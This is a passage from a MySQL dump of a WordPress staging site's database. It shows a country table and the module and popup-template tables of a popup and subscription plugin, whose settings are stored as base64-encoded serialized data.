\"YToxMDp7czo1OiJ0aXRsZSI7czowOiIiO3M6MjE6InR3aXR0ZXJfdGltZWxpbmVfdHlwZSI7czo4OiJ1c2VybmFtZSI7czoyMzoidHdpdHRlcl93aWRnZXRfdXNlcm5hbWUiO3M6MTQ6IkduX2lubm92YXRpb25zIjtzOjE3OiJ0d2l0dGVyX3dpZGdldF9pZCI7czowOiIiO3M6MjA6InR3aXR0ZXJfd2lkZ2V0X3dpZHRoIjtzOjA6IiI7czoyMToidHdpdHRlcl93aWRnZXRfaGVpZ2h0IjtzOjM6IjQwMCI7czoyNjoidHdpdHRlcl93aWRnZXRfdHdlZXRfbGltaXQiO3M6MDoiIjtzOjIwOiJ0d2l0dGVyX3dpZGdldF90aGVtZSI7czo1OiJsaWdodCI7czoyNToidHdpdHRlcl93aWRnZXRfbGlua19jb2xvciI7czo3OiIjM2I5NGQ5IjtzOjI3OiJ0d2l0dGVyX3dpZGdldF9ib3JkZXJfY29sb3IiO3M6NzoiI2Y1ZjVmNSI7fQ==\",\n            \"title\": \"\",\n            \"is_widget_customizer_js_value\": true,\n            \"instance_hash_key\": \"8a4938197cf045c80a0efbaffc6b89a4\"\n        },\n        \"type\": \"option\",\n        \"user_id\": 1\n    }\n}','','','trash','closed','closed','','87bbcdfe-b48d-46af-8893-187ab6c4fff8','','','2017-12-04 13:06:31','2017-12-04 13:06:31','',0,'https://guineeinnove.nimbasolution.com/2017/12/04/87bbcdfe-b48d-46af-8893-187ab6c4fff8/',0,'customize_changeset','',0);
/*!40000 ALTER TABLE `wpstg0_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_pps_countries`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_pps_countries` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(128) NOT NULL,
  `iso_code_2` varchar(2) DEFAULT NULL,
  `iso_code_3` varchar(3) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=241 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_pps_countries`
--

LOCK TABLES `wpstg0_pps_countries` WRITE;
/*!40000 ALTER TABLE `wpstg0_pps_countries` DISABLE KEYS */;
INSERT INTO `wpstg0_pps_countries` VALUES (1,'Afghanistan','AF','AFG'),(2,'Albania','AL','ALB'),(3,'Algeria','DZ','DZA'),(4,'American Samoa','AS','ASM'),(5,'Andorra','AD','AND'),(6,'Angola','AO','AGO'),(7,'Anguilla','AI','AIA'),(8,'Antarctica','AQ','ATA'),(9,'Antigua and Barbuda','AG','ATG'),(10,'Argentina','AR','ARG'),(11,'Armenia','AM','ARM'),(12,'Aruba','AW','ABW'),(13,'Australia','AU','AUS'),(14,'Austria','AT','AUT'),(15,'Azerbaijan','AZ','AZE'),(16,'Bahamas','BS','BHS'),(17,'Bahrain','BH','BHR'),(18,'Bangladesh','BD','BGD'),(19,'Barbados','BB','BRB'),(20,'Belarus','BY','BLR'),(21,'Belgium','BE','BEL'),(22,'Belize','BZ','BLZ'),(23,'Benin','BJ','BEN'),(24,'Bermuda','BM','BMU'),(25,'Bhutan','BT','BTN'),(26,'Bolivia','BO','BOL'),(27,'Bosnia and Herzegowina','BA','BIH'),(28,'Botswana','BW','BWA'),(29,'Bouvet Island','BV','BVT'),(30,'Brazil','BR','BRA'),(31,'British Indian Ocean Territory','IO','IOT'),(32,'Brunei Darussalam','BN','BRN'),(33,'Bulgaria','BG','BGR'),(34,'Burkina Faso','BF','BFA'),(35,'Burundi','BI','BDI'),(36,'Cambodia','KH','KHM'),(37,'Cameroon','CM','CMR'),(38,'Canada','CA','CAN'),(39,'Cape Verde','CV','CPV'),(40,'Cayman Islands','KY','CYM'),(41,'Central African Republic','CF','CAF'),(42,'Chad','TD','TCD'),(43,'Chile','CL','CHL'),(44,'China','CN','CHN'),(45,'Christmas Island','CX','CXR'),(46,'Cocos (Keeling) Islands','CC','CCK'),(47,'Colombia','CO','COL'),(48,'Comoros','KM','COM'),(49,'Congo','CG','COG'),(50,'Cook Islands','CK','COK'),(51,'Costa Rica','CR','CRI'),(52,'Cote D\'Ivoire','CI','CIV'),(53,'Croatia','HR','HRV'),(54,'Cuba','CU','CUB'),(55,'Cyprus','CY','CYP'),(56,'Czech Republic','CZ','CZE'),(57,'Denmark','DK','DNK'),(58,'Djibouti','DJ','DJI'),(59,'Dominica','DM','DMA'),(60,'Dominican Republic','DO','DOM'),(61,'East Timor','TP','TMP'),(62,'Ecuador','EC','ECU'),(63,'Egypt','EG','EGY'),(64,'El Salvador','SV','SLV'),(65,'Equatorial Guinea','GQ','GNQ'),(66,'Eritrea','ER','ERI'),(67,'Estonia','EE','EST'),(68,'Ethiopia','ET','ETH'),(69,'Falkland Islands (Malvinas)','FK','FLK'),(70,'Faroe Islands','FO','FRO'),(71,'Fiji','FJ','FJI'),(72,'Finland','FI','FIN'),(73,'France','FR','FRA'),(74,'France, Metropolitan','FX','FXX'),(75,'French Guiana','GF','GUF'),(76,'French Polynesia','PF','PYF'),(77,'French Southern Territories','TF','ATF'),(78,'Gabon','GA','GAB'),(79,'Gambia','GM','GMB'),(80,'Georgia','GE','GEO'),(81,'Germany','DE','DEU'),(82,'Ghana','GH','GHA'),(83,'Gibraltar','GI','GIB'),(84,'Greece','GR','GRC'),(85,'Greenland','GL','GRL'),(86,'Grenada','GD','GRD'),(87,'Guadeloupe','GP','GLP'),(88,'Guam','GU','GUM'),(89,'Guatemala','GT','GTM'),(90,'Guinea','GN','GIN'),(91,'Guinea-bissau','GW','GNB'),(92,'Guyana','GY','GUY'),(93,'Haiti','HT','HTI'),(94,'Heard and Mc Donald Islands','HM','HMD'),(95,'Honduras','HN','HND'),(96,'Hong Kong','HK','HKG'),(97,'Hungary','HU','HUN'),(98,'Iceland','IS','ISL'),(99,'India','IN','IND'),(100,'Indonesia','ID','IDN'),(101,'Iran (Islamic Republic of)','IR','IRN'),(102,'Iraq','IQ','IRQ'),(103,'Ireland','IE','IRL'),(104,'Israel','IL','ISR'),(105,'Italy','IT','ITA'),(106,'Jamaica','JM','JAM'),(107,'Japan','JP','JPN'),(108,'Jordan','JO','JOR'),(109,'Kazakhstan','KZ','KAZ'),(110,'Kenya','KE','KEN'),(111,'Kiribati','KI','KIR'),(112,'Korea, Democratic People\'s Republic of','KP','PRK'),(113,'Korea, Republic of','KR','KOR'),(114,'Kuwait','KW','KWT'),(115,'Kyrgyzstan','KG','KGZ'),(116,'Lao People\'s Democratic Republic','LA','LAO'),(117,'Latvia','LV','LVA'),(118,'Lebanon','LB','LBN'),(119,'Lesotho','LS','LSO'),(120,'Liberia','LR','LBR'),(121,'Libyan Arab Jamahiriya','LY','LBY'),(122,'Liechtenstein','LI','LIE'),(123,'Lithuania','LT','LTU'),(124,'Luxembourg','LU','LUX'),(125,'Macau','MO','MAC'),(126,'Macedonia, The Former Yugoslav Republic of','MK','MKD'),(127,'Madagascar','MG','MDG'),(128,'Malawi','MW','MWI'),(129,'Malaysia','MY','MYS'),(130,'Maldives','MV','MDV'),(131,'Mali','ML','MLI'),(132,'Malta','MT','MLT'),(133,'Marshall Islands','MH','MHL'),(134,'Martinique','MQ','MTQ'),(135,'Mauritania','MR','MRT'),(136,'Mauritius','MU','MUS'),(137,'Mayotte','YT','MYT'),(138,'Mexico','MX','MEX'),(139,'Micronesia, Federated States of','FM','FSM'),(140,'Moldova, Republic of','MD','MDA'),(141,'Monaco','MC','MCO'),(142,'Mongolia','MN','MNG'),(143,'Montenegro','ME','MNE'),(144,'Montserrat','MS','MSR'),(145,'Morocco','MA','MAR'),(146,'Mozambique','MZ','MOZ'),(147,'Myanmar','MM','MMR'),(148,'Namibia','NA','NAM'),(149,'Nauru','NR','NRU'),(150,'Nepal','NP','NPL'),(151,'Netherlands','NL','NLD'),(152,'Netherlands Antilles','AN','ANT'),(153,'New Caledonia','NC','NCL'),(154,'New Zealand','NZ','NZL'),(155,'Nicaragua','NI','NIC'),(156,'Niger','NE','NER'),(157,'Nigeria','NG','NGA'),(158,'Niue','NU','NIU'),(159,'Norfolk Island','NF','NFK'),(160,'Northern Mariana Islands','MP','MNP'),(161,'Norway','NO','NOR'),(162,'Oman','OM','OMN'),(163,'Pakistan','PK','PAK'),(164,'Palau','PW','PLW'),(165,'Panama','PA','PAN'),(166,'Papua New Guinea','PG','PNG'),(167,'Paraguay','PY','PRY'),(168,'Peru','PE','PER'),(169,'Philippines','PH','PHL'),(170,'Pitcairn','PN','PCN'),(171,'Poland','PL','POL'),(172,'Portugal','PT','PRT'),(173,'Puerto Rico','PR','PRI'),(174,'Qatar','QA','QAT'),(175,'Reunion','RE','REU'),(176,'Romania','RO','ROM'),(177,'Russian Federation','RU','RUS'),(178,'Rwanda','RW','RWA'),(179,'Saint Kitts and Nevis','KN','KNA'),(180,'Saint Lucia','LC','LCA'),(181,'Saint Vincent and the Grenadines','VC','VCT'),(182,'Samoa','WS','WSM'),(183,'San Marino','SM','SMR'),(184,'Sao Tome and Principe','ST','STP'),(185,'Saudi Arabia','SA','SAU'),(186,'Senegal','SN','SEN'),(187,'Serbia','RS','SRB'),(188,'Seychelles','SC','SYC'),(189,'Sierra Leone','SL','SLE'),(190,'Singapore','SG','SGP'),(191,'Slovakia (Slovak Republic)','SK','SVK'),(192,'Slovenia','SI','SVN'),(193,'Solomon Islands','SB','SLB'),(194,'Somalia','SO','SOM'),(195,'South Africa','ZA','ZAF'),(196,'South Georgia and the South Sandwich Islands','GS','SGS'),(197,'Spain','ES','ESP'),(198,'Sri Lanka','LK','LKA'),(199,'St. Helena','SH','SHN'),(200,'St. Pierre and Miquelon','PM','SPM'),(201,'Sudan','SD','SDN'),(202,'Suriname','SR','SUR'),(203,'Svalbard and Jan Mayen Islands','SJ','SJM'),(204,'Swaziland','SZ','SWZ'),(205,'Sweden','SE','SWE'),(206,'Switzerland','CH','CHE'),(207,'Syrian Arab Republic','SY','SYR'),(208,'Taiwan','TW','TWN'),(209,'Tajikistan','TJ','TJK'),(210,'Tanzania, United Republic of','TZ','TZA'),(211,'Thailand','TH','THA'),(212,'Togo','TG','TGO'),(213,'Tokelau','TK','TKL'),(214,'Tonga','TO','TON'),(215,'Trinidad and Tobago','TT','TTO'),(216,'Tunisia','TN','TUN'),(217,'Turkey','TR','TUR'),(218,'Turkmenistan','TM','TKM'),(219,'Turks and Caicos Islands','TC','TCA'),(220,'Tuvalu','TV','TUV'),(221,'Uganda','UG','UGA'),(222,'Ukraine','UA','UKR'),(223,'United Arab Emirates','AE','ARE'),(224,'United Kingdom','GB','GBR'),(225,'United States','US','USA'),(226,'United States Minor Outlying Islands','UM','UMI'),(227,'Uruguay','UY','URY'),(228,'Uzbekistan','UZ','UZB'),(229,'Vanuatu','VU','VUT'),(230,'Vatican City State (Holy See)','VA','VAT'),(231,'Venezuela','VE','VEN'),(232,'Viet Nam','VN','VNM'),(233,'Virgin Islands (British)','VG','VGB'),(234,'Virgin Islands (U.S.)','VI','VIR'),(235,'Wallis and Futuna Islands','WF','WLF'),(236,'Western Sahara','EH','ESH'),(237,'Yemen','YE','YEM'),(238,'Zaire','ZR','ZAR'),(239,'Zambia','ZM','ZMB'),(240,'Zimbabwe','ZW','ZWE');
/*!40000 ALTER TABLE `wpstg0_pps_countries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_pps_modules`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_pps_modules` (
  `id` smallint(3) NOT NULL AUTO_INCREMENT,
  `code` varchar(32) NOT NULL,
  `active` tinyint(1) NOT NULL DEFAULT '0',
  `type_id` tinyint(1) NOT NULL DEFAULT '0',
  `label` varchar(64) DEFAULT NULL,
  `ex_plug_dir` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `code` (`code`)
) ENGINE=InnoDB AUTO_INCREMENT=14 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_pps_modules`
--

LOCK TABLES `wpstg0_pps_modules` WRITE;
/*!40000 ALTER TABLE `wpstg0_pps_modules` DISABLE KEYS */;
INSERT INTO `wpstg0_pps_modules` VALUES (1,'adminmenu',1,1,'Admin Menu',NULL),(2,'options',1,1,'Options',NULL),(3,'user',1,1,'Users',NULL),(4,'pages',1,1,'Pages',NULL),(5,'templates',1,1,'templates',NULL),(6,'supsystic_promo',1,1,'supsystic_promo',NULL),(7,'admin_nav',1,1,'admin_nav',NULL),(8,'popup',1,1,'popup',NULL),(9,'subscribe',1,1,'subscribe',NULL),(10,'sm',1,1,'sm',NULL),(11,'statistics',1,1,'statistics',NULL),(12,'mail',1,1,'mail',NULL),(13,'tgm_promo',1,1,'tgm_promo',NULL);
/*!40000 ALTER TABLE `wpstg0_pps_modules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_pps_modules_type`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_pps_modules_type` (
  `id` smallint(3) NOT NULL AUTO_INCREMENT,
  `label` varchar(32) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_pps_modules_type`
--

LOCK TABLES `wpstg0_pps_modules_type` WRITE;
/*!40000 ALTER TABLE `wpstg0_pps_modules_type` DISABLE KEYS */;
INSERT INTO `wpstg0_pps_modules_type` VALUES (1,'system'),(6,'addons');
/*!40000 ALTER TABLE `wpstg0_pps_modules_type` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_pps_popup`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_pps_popup` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `label` varchar(255) NOT NULL,
  `active` tinyint(1) NOT NULL,
  `original_id` int(11) NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  `html` text NOT NULL,
  `css` text NOT NULL,
  `img_preview` varchar(128) DEFAULT NULL,
  `show_on` tinyint(1) NOT NULL DEFAULT '0',
  `show_to` tinyint(1) NOT NULL DEFAULT '0',
  `show_pages` tinyint(1) NOT NULL DEFAULT '0',
  `type_id` tinyint(1) NOT NULL DEFAULT '1',
  `views` int(11) NOT NULL DEFAULT '0',
  `unique_views` int(11) NOT NULL DEFAULT '0',
  `actions` int(11) NOT NULL DEFAULT '0',
  `date_created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `sort_order` mediumint(5) NOT NULL DEFAULT '0',
  `show_in_admin_area` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=50 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_pps_popup`
--

LOCK TABLES `wpstg0_pps_popup` WRITE;
/*!40000 ALTER TABLE `wpstg0_pps_popup` DISABLE KEYS */;
INSERT INTO `wpstg0_pps_popup` VALUES (1,'List Building',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTU6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjIxOiJoaWRlX2Zvcl9kZXZpY2VzX3Nob3ciO3M6MToiMCI7czoyNDoiaGlkZV9mb3JfcG9zdF90eXBlc19zaG93IjtzOjE6IjAiO3M6MTc6ImhpZGVfZm9yX2lwc19zaG93IjtzOjE6IjAiO3M6MTI6ImhpZGVfZm9yX2lwcyI7czowOiIiO3M6MjM6ImhpZGVfZm9yX2NvdW50cmllc19zaG93IjtzOjE6IjAiO3M6MjM6ImhpZGVfZm9yX2xhbmd1YWdlc19zaG93IjtzOjE6IjAiO31zOjM6InRwbCI7YTo1ODp7czo1OiJ3aWR0aCI7czozOiI4MjQiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6OToiYmdfdHlwZV8wIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18wIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMCI7czo3OiIjZWJlYmViIjtzOjk6ImJnX3R5cGVfMSI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMSI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzEiO3M6NzoiIzA2NmRhYiI7czo5OiJiZ190eXBlXzIiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzIiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8yIjtzOjc6IiMwMGVhZWEiO3M6MTA6ImZvbnRfbGFiZWwiO3M6NzoiZGVmYXVsdCI7czoxNjoibGFiZWxfZm9udF9jb2xvciI7czo3OiIjMDAwMDAwIjtzOjEwOiJmb250X3R4dF8wIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8wIjtzOjc6IiMwMDAwMDAiO3M6MTA6ImZvbnRfdHh0XzEiO3M6NzoiZGVmYXVsdCI7czoxNzoidGV4dF9mb250X2NvbG9yXzEiO3M6NzoiIzAwMDAwMCI7czoxMToiZm9udF9mb290ZXIiO3M6NzoiZGVmYXVsdCI7czoxNzoiZm9vdGVyX2ZvbnRfY29sb3IiO3M6NzoiIzAwMDAwMCI7czo5OiJjbG9zZV9idG4iO3M6MTE6Imxpc3RzX2JsYWNrIjtzOjc6ImJ1bGxldHMiO3M6MTE6Imxpc3RzX2dyZWVuIjtzOjExOiJsYXllcmVkX3BvcyI7czowOiIiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6MTQwOiJUaGUgQmVzdCBXb3JkUHJlc3MgPGkgc3R5bGU9XCJjb2xvcjogIzAwNjlhNztcIj5Qb3BVcCBvcHRpbiBwbHVnaW48L2k+IHRvIGhlbHAgeW91IGdhaW4gbW9yZSBzdWJzY3JpYmVycywgc29jaWFsIGZvbGxvd2VycyBvciBhZHZlcnRpc2VtZW50LiI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czo5OiJlbmJfdHh0XzEiO3M6MToiMSI7czoxMzoiZW5iX2Zvb3Rfbm90ZSI7czoxOiIxIjtzOjk6ImZvb3Rfbm90ZSI7czoxMTg6IldlIHJlc3BlY3QgeW91ciBwcml2YWN5LiBZb3VyIGluZm9ybWF0aW9uIHdpbGwgbm90IGJlIHNoYXJlZCB3aXRoIGFueSB0aGlyZCBwYXJ0eSBhbmQgeW91IGNhbiB1bnN1YnNjcmliZSBhdCBhbnkgdGltZSAiO3M6MTU6ImVuYl9zbV9mYWNlYm9vayI7czoxOiIxIjtzOjE3OiJlbmJfc21fZ29vZ2xlcGx1cyI7czoxOiIxIjtzOjE0OiJlbmJfc21fdHdpdHRlciI7czoxOiIxIjtzOjk6InNtX2Rlc2lnbiI7czo2OiJzaW1wbGUiO3M6ODoiYW5pbV9rZXkiO3M6NDoibm9uZSI7czoxMzoiYW5pbV9kdXJhdGlvbiI7czowOiIiO3M6MTM6ImVuYl9zdWJzY3JpYmUiO3M6MToiMSI7czo4OiJzdWJfZGVzdCI7czo5OiJ3b3JkcHJlc3MiO3M6MjM6InN1Yl93cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjE5OiJzdWJfYXdlYmVyX2xpc3RuYW1lIjtzOjA6IiI7czoyMToic3ViX2F3ZWJlcl9hZHRyYWNraW5nIjtzOjA6IiI7czoyMToic3ViX21haWxjaGltcF9hcGlfa2V5IjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MTY6InN1Yl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHN1YnNjcmlwdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTc6IllvdSBzdWJzY3JpYmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHN1YnNjcmlwdGlvbi4gSWYgeW91IGRpZCBub3Qgc3Vic2NyaWJlIGhlcmUgLSBqdXN0IGlnbm9yZSB0aGlzIG1lc3NhZ2UuIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjM3OiJbc2l0ZW5hbWVdIFlvdXIgdXNlcm5hbWUgYW5kIHBhc3N3b3JkIjtzOjI4OiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo2NToiVXNlcm5hbWU6IFt1c2VyX2xvZ2luXTxiciAvPlBhc3N3b3JkOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MjU6InN1Yl9yZWRpcmVjdF9lbWFpbF9leGlzdHMiO3M6MDoiIjtzOjEzOiJzdWJfYnRuX2xhYmVsIjtzOjg6IlNpZ24tdXAhIjtzOjEzOiJzdWJfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToic3ViX25ld19tZXNzYWdlIjtzOjEyOToiWW91IGhhdmUgbmV3IHN1YnNjcmliZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSB1cyBzdWJzY3JpYmVyIGluZm9ybWF0aW9uOjxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjtzOjU6InR4dF8wIjtzOjE2MDoiPHA+PGEgaHJlZj1cImh0dHA6Ly9zdXBzeXN0aWMuY29tXCIgdGFyZ2V0PVwiX2JsYW5rXCI+PGltZyBzdHlsZT1cIm1heC13aWR0aDogMjAwcHg7XCIgc3JjPVwiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvc3Vwc3lzdGljX2ljb24ucG5nXCIgYWx0PVwiXCIgLz48L2E+PC9wPiI7czo1OiJ0eHRfMSI7czozMTM6IjxwPlBvcHVwIGJ5IFN1cHN5c3RpYyBsZXRzIHlvdSBlYXNpbHkgY3JlYXRlIGVsZWdhbnQgb3ZlcmxhcHBpbmcgd2luZG93cyB3aXRoIHVubGltaXRlZCBmZWF0dXJlcy4gUG9wLXVwcyB3aXRoIFNsaWRlciwgTGlnaHRib3gsIENvbnRhY3QgYW5kIFN1YnNjcmlwdGlvbiBmb3JtcyBhbmQgbW9yZTo8L3A+PHVsPjxsaT5VbmxpbWl0ZWQgQ29udGVudCBDdXN0b21pemF0aW9uPC9saT48bGk+QXV0byBPcGVuIFBvcHVwczwvbGk+PGxpPkNvbnRhY3QgRm9ybSB3aXRoIHBvcC11cDwvbGk+PGxpPlBvcHVwIE9wZW5pbmcgQW5pbWF0aW9uczwvbGk+PC91bD4iO31zOjEwOiJvcHRzX2F0dHJzIjthOjI6e3M6OToiYmdfbnVtYmVyIjtzOjE6IjMiO3M6MTY6InR4dF9ibG9ja19udW1iZXIiO3M6MToiMiI7fX0=','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n			[if enb_txt_1]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_1 ppsPopupTxt_1\">\r\n				[txt_1]\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n		</div>\r\n		<div class=\"ppsRightCol\">\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			[if enb_sm]\r\n				<div class=\"ppsSm\">\r\n				[sm_html]\r\n				</div>\r\n			[endif]\r\n			[if enb_foot_note]\r\n				<div class=\"ppsFootNote\">\r\n				[foot_note]\r\n				</div>\r\n			[endif]\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: Georgia, Times, serif;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 66%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	display: table-cell;\r\n  	vertical-align: top;\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); 